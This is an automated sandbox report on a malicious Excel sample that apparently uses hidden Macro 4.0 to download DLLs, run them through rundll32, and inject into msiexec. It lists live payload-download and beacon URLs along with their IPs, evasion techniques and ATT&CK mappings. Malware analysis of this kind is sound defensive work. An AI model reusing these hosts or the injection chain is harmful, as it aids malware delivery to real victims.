    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,4_2_003569A0
    Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ubc\way.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\ProgramData\formnet.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exe TID: 2864Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040A0CC
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003569A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,4_2_003569A0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034D830 LoadLibraryA,GetProcAddress,4_2_0034D830
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00352EF0 mov eax, dword ptr fs:[00000030h]4_2_00352EF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420D28 mov eax, dword ptr fs:[00000030h]4_2_00420D28
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420C5E mov eax, dword ptr fs:[00000030h]4_2_00420C5E
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00420865 push dword ptr fs:[00000030h]4_2_00420865
    Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E2EF0 mov eax, dword ptr fs:[00000030h]5_2_000E2EF0
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040A0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040A0CC
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040ABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040ABA4

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Contains functionality to inject code into remote processesShow sources
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0034AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,4_2_0034AE40
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: case (4335).xls, type: SAMPLE
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exeJump to behavior
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: msiexec.exe, 00000005.00000002.2356165032.0000000000A30000.00000002.00000001.sdmpBinary or memory string: !Progman
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0040968A cpuid 4_2_0040968A
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,4_2_0040F6BB
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_004095A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_004095A6
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00341A00 CreateDialogParamW,GetVersion,4_2_00341A00
    Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting4Path InterceptionAccess Token Manipulation1Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution43Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting4Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery35Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRundll321Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Software Packing2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.rundll32.exe.340000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
    5.2.msiexec.exe.d0000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    https://gadgetswolf.com/post.phpMb0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
    https://gadgetswolf.com/0%Avira URL Cloudsafe
    https://rnollg.com/kev/scfrd.dll0%Avira URL Cloudsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    https://gadgetswolf.com/f0%Avira URL Cloudsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://gadgetswolf.com/post.phpab0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~0%Avira URL Cloudsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    http://ocsp.entrust.net0D0%URL Reputationsafe
    https://rnollg.com/kev/scfrd.dll$80%Avira URL Cloudsafe
    https://homesoapmolds.com/0%Avira URL Cloudsafe
    https://govemedico.tk/post.php0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    homesoapmolds.com
    104.21.60.169
    truefalse
      unknown
      rnollg.com
      172.67.150.228
      truefalse
        unknown
        gadgetswolf.com
        172.67.200.147
        truefalse
          unknown
          govemedico.tk
          104.21.73.69
          truefalse
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)0FDE0000.0.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
              high
              http://investor.msn.comrundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                high
                http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                  high
                  http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    high
                    http://ocsp.entrust.net03msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/post.phpMbmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://gadgetswolf.com/msiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://rnollg.com/kev/scfrd.dllbefore.1.0.0.sheet.csv_unpacktrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                      high
                      https://gadgetswolf.com/fmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                        high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2157152768.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2155127079.0000000001FB7000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://gadgetswolf.com/post.phpabmsiexec.exe, 00000005.00000002.2356048675.000000000048D000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.msiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.com/rundll32.exe, 00000003.00000002.2155870146.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154867305.0000000001DD0000.00000002.00000001.sdmpfalse
                            high
                            http://www.%s.comPAmsiexec.exe, 00000005.00000002.2356240442.0000000002060000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~case (4335).xlsfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://rnollg.com/kev/scfrd.dll$8case (4335).xls, 0FDE0000.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                              high
                              https://homesoapmolds.com/msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                                high
                                https://govemedico.tk/post.phpmsiexec.exe, 00000005.00000002.2356072686.00000000004F0000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                172.67.150.228
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                104.21.60.169
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                172.67.200.147
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                104.21.73.69
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse

                                General Information

                                Joe Sandbox Version:31.0.0 Emerald
                                Analysis ID:344665
                                Start date:26.01.2021
                                Start time:21:34:07
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 6m 8s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:case (4335).xls
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:8
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.expl.evad.winXLS@7/12@4/4
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 67.8% (good quality ratio 67.4%)
                                • Quality average: 89.5%
                                • Quality standard deviation: 19.2%
                                HCA Information:
                                • Successful, ratio: 83%
                                • Number of executed functions: 40
                                • Number of non-executed functions: 28
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xls
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/344665/sample/case (4335).xls

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                21:35:12API Interceptor1205x Sleep call for process: msiexec.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                172.67.150.228case (1522).xlsGet hashmaliciousBrowse
                                  case (166).xlsGet hashmaliciousBrowse
                                    104.21.60.169case (1522).xlsGet hashmaliciousBrowse
                                      case (4374).xlsGet hashmaliciousBrowse
                                        172.67.200.147case (1522).xlsGet hashmaliciousBrowse
                                          104.21.73.69case (1522).xlsGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            gadgetswolf.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 172.67.200.147
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.44.135
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 104.21.44.135
                                            rnollg.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 172.67.150.228
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.150.228
                                            govemedico.tkcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 172.67.158.184
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.158.184
                                            homesoapmolds.comcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145
                                            CLOUDFLARENETUScase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 172.67.198.109
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.19.94
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.16.18.94
                                            Informacion.docGet hashmaliciousBrowse
                                            • 104.21.89.78
                                            PAYMENT.260121.xlsxGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            SecuriteInfo.com.Trojan.Packed2.42783.27799.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            SecuriteInfo.com.Trojan.Packed2.42783.24703.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            Ewqm21Iwdh.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            a4iz7zkilq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            Vcg9GH4CWw.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.23.220
                                            nMn5eAMhBy.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            sSPHg0Y2cZ.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            vK6VPijMoq.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            8gom3VEZLS.exeGet hashmaliciousBrowse
                                            • 172.67.188.154
                                            y4Gpxq7eWg.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            v07PSzmSp9.exeGet hashmaliciousBrowse
                                            • 66.235.200.145

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            7dcce5b76c8b17472d024758970a406bcase (1522).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (4374).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (166).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            PAYMENT.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (547).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            The Mental Health Center.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            Remittance Advice 117301.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            SC-TR1167700000.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            PAYMENT INFO.xlsxGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (348).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            RefTreeAnalyserXL.xlamGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (426).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (250).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (1447).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (850).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            SecuriteInfo.com.Heur.18472.xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (1543).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case_1581.xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69
                                            case (435).xlsGet hashmaliciousBrowse
                                            • 104.21.60.169
                                            • 172.67.150.228
                                            • 172.67.200.147
                                            • 104.21.73.69

                                            Dropped Files

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            C:\ProgramData\formnet.dllcase (1522).xlsGet hashmaliciousBrowse
                                              case (4374).xlsGet hashmaliciousBrowse
                                                case (166).xlsGet hashmaliciousBrowse
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dllcase (1522).xlsGet hashmaliciousBrowse
